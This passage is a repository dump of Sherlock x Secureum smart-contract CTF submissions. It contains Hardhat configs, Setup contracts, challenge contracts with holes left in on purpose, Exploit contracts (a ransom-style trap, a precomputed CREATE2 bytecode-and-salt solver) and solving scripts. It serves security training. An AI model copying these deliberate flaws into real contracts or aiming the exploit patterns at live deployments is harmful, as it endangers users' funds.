variables aren't really used or are just copy-pasta as a bluff 20 | } 21 | } -------------------------------------------------------------------------------- /JustDravee/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /JustDravee/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /JustDravee/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "sherlocked-ctf", 3 | "scripts": { 4 | "ctf-test": "npx hardhat run scripts/solving.js --show-stack-traces", 5 | "deploy": "npx hardhat run scripts/goerli/deploy.js --network goerli" 6 | }, 7 | "devDependencies": { 8 | "@nomiclabs/hardhat-ethers": "^2.0.4", 9 | "@nomiclabs/hardhat-waffle": "^2.0.2", 10 | "chai": "^4.3.6", 11 | "ethereum-waffle": "^3.4.0", 12 | "ethers": "^5.5.3", 13 | "hardhat": "^2.8.3" 14 | }, 15 | "dependencies": { 16 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 17 | "dotenv": "^14.3.2" 18 | } 19 | } -------------------------------------------------------------------------------- /JustDravee/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy(); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt( 15 | "SheerLocking", 16 | await setup.instance() 17 | ); 18 | 19 | console.log("Deployed setup to", setup.address); 20 | console.log("Deployed ctf to", ctf.address); 21 | 22 | // wait for etherscan to index 23 | await sleep(300); 24 | 25 | // verify 26 | await hre.run("verify:verify", { 27 | address: setup.address, 28 | }); 29 | await hre.run("verify:verify", { 30 | address: ctf.address, 31 | }); 32 | } 33 | 34 | main() 35 | .then(() => process.exit(0)) 36 | .catch((error) => { 37 | console.error(error); 38 | process.exit(1); 39 | }); -------------------------------------------------------------------------------- /JustDravee/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | const setup = await SETUP.deploy(); 8 | const ctf = await ethers.getContractAt( 9 | "SheerLocking", 10 | await setup.instance() 11 | ); 12 | 13 | console.log("solved:", await setup.isSolved()); 14 | 15 | await EXPLOIT.deploy(ctf.address, { value: parseEther("1") }); 16 | 17 | console.log("solved:", await setup.isSolved()); 18 | } 19 | 20 | main() 21 | .then(() => process.exit(0)) 22 | .catch((error) => { 23 | console.error(error); 24 | process.exit(1); 25 | }); -------------------------------------------------------------------------------- /KahanMajmudar/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /KahanMajmudar/.prettierrc: -------------------------------------------------------------------------------- 1 | { 2 | "arrowParens": "always", 3 | "bracketSpacing": true, 4 | "endOfLine": "lf", 5 | "printWidth": 80, 6 | "semi": false, 7 | "singleQuote": true, 8 | "tabWidth": 4, 9 | "useTabs": true, 10 | "overrides": [ 11 | { 12 | "files": "*.sol", 13 | "options": { 14 | "printWidth": 80, 15 | "tabWidth": 4, 16 | "useTabs": false, 17 | "singleQuote": false, 18 | "bracketSpacing": false, 19 | "explicitTypes": "always" 20 | } 21 | } 22 | ] 23 | } -------------------------------------------------------------------------------- /KahanMajmudar/README.md: -------------------------------------------------------------------------------- 1 | # Basic Sample Hardhat Project 2 | 3 | This project demonstrates a basic Hardhat use case. It comes with a sample contract, a test for that contract, a sample script that deploys that contract, and an example of a task implementation, which simply lists the available accounts. 4 | 5 | Try running some of the following tasks: 6 | 7 | ```shell 8 | npx hardhat accounts 9 | npx hardhat compile 10 | npx hardhat clean 11 | npx hardhat test 12 | npx hardhat node 13 | node scripts/sample-script.js 14 | npx hardhat help 15 | ``` 16 | -------------------------------------------------------------------------------- /KahanMajmudar/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.4; 3 | 4 | import "./CustomMarketplace.sol"; 5 | 6 | contract Exploit { 7 | bool internal ransomEnabled = true; 8 | 9 | constructor(CustomMarketplace instance) {} 10 | 11 | function finalize() public payable { 12 | if (msg.value >= 99 ether) { 13 | ransomEnabled = false; 14 | } 15 | } 16 | 17 | fallback() external payable { 18 | require(!ransomEnabled); 19 | } 20 | 21 | receive() external payable { 22 | require(!ransomEnabled); 23 | } 24 | 25 | function isRansomPaid() external view returns (bool) { 26 | return !ransomEnabled; 27 | } 28 | 29 | function getBalance() public view returns (uint256) { 30 | return address(this).balance; 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /KahanMajmudar/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.4; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /KahanMajmudar/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.4; 3 | 4 | import "./ISetup.sol"; 5 | import "./CustomMarketplace.sol"; 6 | import "./Exploit.sol"; 7 | 8 | contract Setup is ISetup { 9 | CustomMarketplace public instance; 10 | Exploit public exploit; 11 | 12 | constructor() { 13 | instance = new CustomMarketplace(); 14 | exploit = new Exploit(instance); 15 | 16 | emit Deployed(address(instance)); 17 | 18 | instance.createNFTAndPutOnSale("ipfs://", 5000, 1e18); 19 | instance.updateInfo(1, address(exploit), 5000, 1e18); 20 | } 21 | 22 | function isSolved() external view override returns (bool) { 23 | return exploit.isRansomPaid(); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /KahanMajmudar/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require('@nomiclabs/hardhat-waffle') 2 | require('@nomiclabs/hardhat-etherscan') 3 | require('dotenv').config() 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || '' 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || '' 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || '' 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task('accounts', 'Prints the list of accounts', async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners() 13 | 14 | for (const account of accounts) { 15 | console.log(account.address) 16 | } 17 | }) 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: '0.8.4', 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ''), 37 | }, 38 | }, 39 | } 40 | -------------------------------------------------------------------------------- /KahanMajmudar/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "scripts": { 4 | "compile": "npx hardhat compile", 5 | "clean": "rm -rf artifacts/ cache/" 6 | }, 7 | "devDependencies": { 8 | "@nomiclabs/hardhat-ethers": "^2.0.5", 9 | "@nomiclabs/hardhat-etherscan": "^3.0.1", 10 | "@nomiclabs/hardhat-waffle": "^2.0.2", 11 | "chai": "^4.3.6", 12 | "dotenv": "^16.0.0", 13 | "ethereum-waffle": "^3.4.0", 14 | "ethers": "^5.5.4", 15 | "hardhat": "^2.8.4", 16 | "prettier-plugin-solidity": "^1.0.0-beta.19" 17 | }, 18 | "dependencies": { 19 | "@openzeppelin/contracts": "^4.5.0" 20 | } 21 | } -------------------------------------------------------------------------------- /KahanMajmudar/scripts/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require('ethers/lib/utils') 2 | const hre = require('hardhat') 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)) 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory('Setup') 10 | 11 | const setup = await SETUP.deploy() 12 | await setup.deployed() 13 | 14 | const ctf = await ethers.getContractAt( 15 | 'CustomMarketplace', 16 | await setup.instance() 17 | ) 18 | 19 | console.log('Deployed setup to', setup.address) 20 | console.log('Deployed ctf to', ctf.address) 21 | 22 | // wait for etherscan to index 23 | await sleep(300) 24 | 25 | verify 26 | await hre.run('verify:verify', { 27 | address: setup.address, 28 | }) 29 | await hre.run('verify:verify', { 30 | address: ctf.address, 31 | }) 32 | } 33 | 34 | main() 35 | .then(() => process.exit(0)) 36 | .catch((error) => { 37 | console.error(error) 38 | process.exit(1) 39 | }) 40 | -------------------------------------------------------------------------------- /KahanMajmudar/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require('ethers/lib/utils') 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory('Setup') 5 | const EXPLOIT = await ethers.getContractFactory('Exploit') 6 | 7 | const setup = await SETUP.deploy() 8 | 9 | console.log('before exploit: solved:', await setup.isSolved()) 10 | 11 | const exploit = await ethers.getContractAt('Exploit', await setup.exploit()) 12 | await exploit.finalize({ value: parseEther('99') }) 13 | 14 | console.log('after exploit: solved:', await setup.isSolved()) 15 | } 16 | 17 | main() 18 | .then(() => process.exit(0)) 19 | .catch((error) => { 20 | console.error(error) 21 | process.exit(1) 22 | }) 23 | -------------------------------------------------------------------------------- /PeterisPrieditis/.gitignore: -------------------------------------------------------------------------------- 1 | /node_modules 2 | .env 3 | 4 | #Hardhat files 5 | cache 6 | artifacts 7 | -------------------------------------------------------------------------------- /PeterisPrieditis/README.md: -------------------------------------------------------------------------------- 1 | # Sherlock x Secureum CTF submission 2 | 3 | Kick-off presentation: https://docs.google.com/presentation/d/1f_SFUs9nP9LMgxUETO07SW3h-vz9fxagFw_Tq9JZ9qM/edit?usp=sharing 4 | 5 | > Don't deploy the solution (`Exploit.sol`) to a public chain! 6 | 7 | | Contract | Goerli | 8 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 9 | | StableSwap2.sol | [0x94f12A6fb7D9B0cBBc43CdDC6A4827649f757c72](https://goerli.etherscan.io/address/0x94f12A6fb7D9B0cBBc43CdDC6A4827649f757c72) | 10 | | Setup.sol | [0x64A9fcaD8D299aF9B1a96dA17458c0b3D876b687 ](https://goerli.etherscan.io/address/0x64A9fcaD8D299aF9B1a96dA17458c0b3D876b687) | 11 | 12 | `.env` file 13 | 14 | ``` 15 | ETHERSCAN_API= 16 | ALCHEMY_API_KEY_GOERLI= 17 | PRIVATE_KEY= 18 | ``` -------------------------------------------------------------------------------- /PeterisPrieditis/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.0; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /PeterisPrieditis/contracts/test/TestERC20.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.0; 3 | 4 | import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol"; 5 | 6 | contract TestERC20 is ERC20 { 7 | constructor( 8 | string memory name_, 9 | string memory symbol_, 10 | uint256 amount 11 | ) ERC20(name_, symbol_) { 12 | _mint(msg.sender, amount); 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /PeterisPrieditis/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: { 27 | compilers: [ 28 | { 29 | version: "0.8.0" 30 | } 31 | ] 32 | }, 33 | etherscan: { 34 | // Your API key for Etherscan 35 | // Obtain one at https://etherscan.io/ 36 | apiKey: ETHERSCAN_API, 37 | }, 38 | networks: { 39 | goerli: { 40 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 41 | //gasPrice: 900000000000, 42 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 43 | }, 44 | }, 45 | }; -------------------------------------------------------------------------------- /PeterisPrieditis/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "sherlock-ctf-0x0-PeterisPrieditis", 3 | "devDependencies": { 4 | "hardhat": "^2.8.4", 5 | "@nomiclabs/hardhat-ethers": "^2.0.4", 6 | "@nomiclabs/hardhat-waffle": "^2.0.2", 7 | "chai": "^4.3.6", 8 | "ethereum-waffle": "^3.4.0", 9 | "ethers": "^5.5.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "dotenv": "^14.3.2", 14 | "@openzeppelin/contracts": "^4.5.0" 15 | } 16 | } -------------------------------------------------------------------------------- /PeterisPrieditis/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | //npx hardhat run --network goerli scripts/goerli/deploy.js 2 | 3 | const { parseEther } = require("ethers/lib/utils"); 4 | const hre = require("hardhat"); 5 | 6 | function sleep(seconds) { 7 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 8 | } 9 | 10 | async function main() { 11 | const SETUP = await ethers.getContractFactory("Setup"); 12 | 13 | const setup = await SETUP.deploy({ value: parseEther("0.0000374") }); 14 | await setup.deployed(); 15 | 16 | const ctf = await ethers.getContractAt( 17 | "StableSwap2", 18 | await setup.instance() 19 | ); 20 | 21 | console.log("Deployed setup to", setup.address); 22 | console.log("Deployed ctf to", ctf.address); 23 | 24 | // wait for etherscan to index 25 | await sleep(300); 26 | 27 | // verify 28 | await hre.run("verify:verify", { 29 | address: setup.address, 30 | }); 31 | await hre.run("verify:verify", { 32 | address: ctf.address, 33 | }); 34 | } 35 | 36 | main() 37 | .then(() => process.exit(0)) 38 | .catch((error) => { 39 | console.error(error); 40 | process.exit(1); 41 | }); 42 | -------------------------------------------------------------------------------- /PeterisPrieditis/scripts/solving.js: -------------------------------------------------------------------------------- 1 | //npx hardhat compile 2 | //npx hardhat run scripts/solving.js 3 | 4 | const hre = require("hardhat"); 5 | const ethers = hre.ethers; 6 | const { parseEther } = require("ethers/lib/utils"); 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 11 | 12 | const setup = await SETUP.deploy({ value: parseEther("0.0000374") }); 13 | const ctf = await ethers.getContractAt( 14 | "StableSwap2", 15 | await setup.instance() 16 | ); 17 | 18 | console.log("Before exploit - solved:", await setup.isSolved()); 19 | 20 | await EXPLOIT.deploy(ctf.address); 21 | 22 | console.log("After exploit - solved:", await setup.isSolved()); 23 | } 24 | 25 | main() 26 | .then(() => process.exit(0)) 27 | .catch((error) => { 28 | console.error(error); 29 | process.exit(1); 30 | }); -------------------------------------------------------------------------------- /RomiRand/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules/ 2 | cache/ 3 | artifacts/ 4 | .vscode/ 5 | docgen/ 6 | 7 | .env 8 | -------------------------------------------------------------------------------- /RomiRand/README.md: -------------------------------------------------------------------------------- 1 | # CTF submission 2 | 3 | 4 | | Contract | Goerli | 5 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 6 | | Unbreakable.sol | [0x3dc21F58F3b77aDD4AD5D40992C0B431bdFFc6B8](https://goerli.etherscan.io/address/0x3dc21F58F3b77aDD4AD5D40992C0B431bdFFc6B8) | 7 | | Setup.sol | [0x85CCd0c58Fe07DC6716f1EfCcAba0164b97ae66B](https://goerli.etherscan.io/address/0x85CCd0c58Fe07DC6716f1EfCcAba0164b97ae66B) | 8 | 9 | 10 | 11 | Let's hope there are no more mistakes. 12 | 13 | I wonder if it's easy/hard compared to the others. 14 | It's a lot of fun, thanks for doing this! -------------------------------------------------------------------------------- /RomiRand/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.11; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /RomiRand/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.11; 3 | 4 | import './ISetup.sol'; 5 | import './Unbreakable.sol'; 6 | import "@openzeppelin/contracts/utils/Address.sol"; 7 | 8 | contract Setup is ISetup { 9 | Unbreakable public instance; 10 | 11 | constructor() { 12 | instance = new Unbreakable(); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | return !Address.isContract(address(instance)); 18 | } 19 | } -------------------------------------------------------------------------------- /RomiRand/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | require('hardhat-docgen'); 5 | 6 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 7 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 8 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 9 | 10 | // This is a sample Hardhat task. To learn how to create your own go to 11 | // https://hardhat.org/guides/create-task.html 12 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 13 | const accounts = await hre.ethers.getSigners(); 14 | 15 | for (const account of accounts) { 16 | console.log(account.address); 17 | } 18 | }); 19 | 20 | // You need to export an object to set up your config 21 | // Go to https://hardhat.org/config/ to learn more 22 | 23 | /** 24 | * @type import('hardhat/config').HardhatUserConfig 25 | */ 26 | module.exports = { 27 | solidity: "0.8.11", 28 | etherscan: { 29 | // Your API key for Etherscan 30 | // Obtain one at https://etherscan.io/ 31 | apiKey: ETHERSCAN_API, 32 | }, 33 | networks: { 34 | goerli: { 35 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 36 | gasPrice: 900000000000, 37 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 38 | }, 39 | }, 40 | }; 41 | -------------------------------------------------------------------------------- /RomiRand/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "@openzeppelin/contracts": "^4.4.2", 14 | "dotenv": "^14.3.2", 15 | "hardhat-docgen": "^1.3.0", 16 | "hardhat-gas-reporter": "^1.0.7", 17 | "solidity-code-metrics": "^0.0.19" 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /RomiRand/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy(); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt( 15 | "Unbreakable", 16 | await setup.instance() 17 | ); 18 | 19 | console.log("Deployed setup to", setup.address); 20 | console.log("Deployed ctf to", ctf.address); 21 | 22 | // wait for etherscan to index 23 | await sleep(300); 24 | 25 | // verify 26 | await hre.run("verify:verify", { 27 | address: setup.address, 28 | }); 29 | await hre.run("verify:verify", { 30 | address: ctf.address, 31 | }); 32 | } 33 | 34 | main() 35 | .then(() => process.exit(0)) 36 | .catch((error) => { 37 | console.error(error); 38 | process.exit(1); 39 | }); 40 | -------------------------------------------------------------------------------- /RomiRand/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | // const [owner, attacker, addr2] = await ethers.getSigners(); 5 | const SETUP = await ethers.getContractFactory("Setup"); 6 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 7 | 8 | const setup = await SETUP.deploy(); 9 | const ctf = await ethers.getContractAt( 10 | "Unbreakable", 11 | await setup.instance() 12 | ); 13 | 14 | console.log("solved:", await setup.isSolved()); 15 | exploit = await EXPLOIT.deploy(ctf.address); 16 | await exploit.finalize(); 17 | console.log("solved:", await setup.isSolved()); 18 | } 19 | 20 | main() 21 | .then(() => process.exit(0)) 22 | .catch((error) => { 23 | console.error(error); 24 | process.exit(1); 25 | }); 26 | -------------------------------------------------------------------------------- /Thro77le/README.md: -------------------------------------------------------------------------------- 1 | # sherlock-ctf-0x0-Thro77le 2 | 3 | 4 | | Contract | Goerli | 5 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 6 | | Setup.sol | [0xBF3e5530aB7Dcba712E3A7fA99463d46eb6a0c8e](https://goerli.etherscan.io/address/0xBF3e5530aB7Dcba712E3A7fA99463d46eb6a0c8e) | 7 | | Challenge.sol | [0xd9C72eD9DdeF04D0Ab88aE2403C383Ffbd11a71c](https://goerli.etherscan.io/address/0xd9C72eD9DdeF04D0Ab88aE2403C383Ffbd11a71c) | 8 | -------------------------------------------------------------------------------- /Thro77le/contracts/Challenge.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | 4 | interface IFactory { 5 | function createContract(bytes memory bytecode, uint salt) external returns (bool); 6 | } 7 | 8 | contract Challenge { 9 | bool public isSolved; 10 | IFactory factory; 11 | 12 | constructor(address _factory) { 13 | factory = IFactory(_factory); 14 | } 15 | 16 | function createContract(bytes memory bytecode, uint salt) public { 17 | isSolved = factory.createContract(bytecode, salt); 18 | } 19 | } -------------------------------------------------------------------------------- /Thro77le/contracts/Dummy.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | // Attack should be handled by EOA 4 | // See sherlock.test.ts file for solution 5 | 6 | contract Dummy { 7 | uint256 dummy; 8 | 9 | function dummy_function() public { 10 | dummy++; 11 | } 12 | } -------------------------------------------------------------------------------- /Thro77le/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | // Attack should be handled off-chain, preferably by EOA 2 | // See sherlock.test.ts file for solution 3 | 4 | // This on-chain solution has precomputed correct answer 5 | // It's purpose is to adhere to CTF's interface 6 | 7 | pragma solidity 0.8.4; 8 | 9 | interface IChallenge { 10 | function createContract(bytes memory bytecode, uint salt) external; 11 | } 12 | 13 | interface ISetup { 14 | function isSolved() external view returns (bool); 15 | } 16 | 17 | contract Exploit { 18 | address challenge; 19 | address setup; 20 | 21 | 22 | constructor(address _challenge, address _setup) { 23 | challenge = _challenge; 24 | setup = _setup; 25 | 26 | bytes memory bytecode = hex'608060405234801561001057600080fd5b5060ff8061001f6000396000f3fe6080604052348015600f57600080fd5b506004361060285760003560e01c80632d2927e314602d575b600080fd5b60336035565b005b6000808154809291906045906056565b9190505550565b6000819050919050565b6000605f82604c565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415608f57608e609a565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fdfea26469706673582212202dd8f946c86b039bf8ab0fff75a9e79926858f282f784a8f54c1c5b99c8652a764736f6c63430008040033'; 27 | uint256 salt = 23167279743460724461247717006863355784470130553221099219428282400133720571904; 28 | 29 | IChallenge(challenge).createContract(bytecode, salt); 30 | 31 | require(ISetup(setup).isSolved(), "Exploit failed"); 32 | } 33 | } -------------------------------------------------------------------------------- /Thro77le/contracts/Factory.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | contract Factory { 4 | function createContract(bytes memory bytecode, uint salt) public returns (bool) { 5 | address addr; 6 | assembly { 7 | addr := create2(0, add(bytecode, 0x20), mload(bytecode), salt) 8 | if iszero(extcodesize(addr)) { 9 | revert(0, 0) 10 | } 11 | } 12 | require(isForbidden(addr), "Only Forbidden Contracts"); 13 | require(isFunded(addr), "Only Funded Contracts"); 14 | return true; 15 | } 16 | 17 | function isForbidden(address _addr) internal view returns (bool) { 18 | bytes20 addr = bytes20(_addr); 19 | bytes20 id = hex"00000000000000000000000000000000000f0b1d"; 20 | bytes20 mask = hex"00000000000000000000000000000000000fffff"; 21 | 22 | for (uint256 i; i != 30; ++i) { 23 | if (addr & mask == id) { 24 | return true; 25 | } 26 | mask <<= 4; 27 | id <<= 4; 28 | } 29 | 30 | return false; 31 | } 32 | 33 | function isFunded(address _addr) internal view returns (bool) { 34 | return _addr.balance >= 0.1 ether; 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /Thro77le/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // Challenge name: Counterfactual 2 | // Author: Throttle (@_no_handlebars) 3 | 4 | 5 | pragma solidity 0.8.4; 6 | 7 | import "./Factory.sol"; 8 | import "./Challenge.sol"; 9 | 10 | contract Setup { 11 | event Deployed(address); 12 | 13 | Factory public factory; 14 | Challenge public challenge; 15 | 16 | constructor() { 17 | factory = new Factory(); 18 | challenge = new Challenge(address(factory)); 19 | emit Deployed(address(challenge)); 20 | } 21 | 22 | function isSolved() external view returns (bool) { 23 | return challenge.isSolved(); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /Thro77le/hardhat.config.ts: -------------------------------------------------------------------------------- 1 | import '@nomiclabs/hardhat-waffle'; 2 | import { HardhatUserConfig } from "hardhat/config"; 3 | import "@typechain/hardhat"; 4 | import "@nomiclabs/hardhat-etherscan"; 5 | 6 | require("dotenv").config(); 7 | 8 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 9 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 10 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 11 | 12 | const config: HardhatUserConfig = { 13 | solidity: "0.8.4", 14 | etherscan: { 15 | apiKey: ETHERSCAN_API, 16 | }, 17 | networks: { 18 | goerli: { 19 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 20 | gasPrice: 900000000000, 21 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 22 | }, 23 | }, 24 | typechain: { 25 | outDir: "types", 26 | target: "ethers-v5", 27 | }, 28 | }; 29 | 30 | export default config; 31 | -------------------------------------------------------------------------------- /Thro77le/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Sherlock-CTF-Throttle", 3 | "version": "1.0.0", 4 | "main": "index.js", 5 | "repository": "s", 6 | "author": "Thro77le", 7 | "license": "MIT", 8 | "devDependencies": { 9 | "@nomiclabs/hardhat-ethers": "^2.0.3", 10 | "@nomiclabs/hardhat-waffle": "^2.0.1", 11 | "@typechain/hardhat": "^3.0.0", 12 | "@types/chai": "^4.2.22", 13 | "@types/mocha": "^9.0.0", 14 | "@types/node": "^16.11.11", 15 | "chai": "^4.3.4", 16 | "ethereum-waffle": "^3.4.0", 17 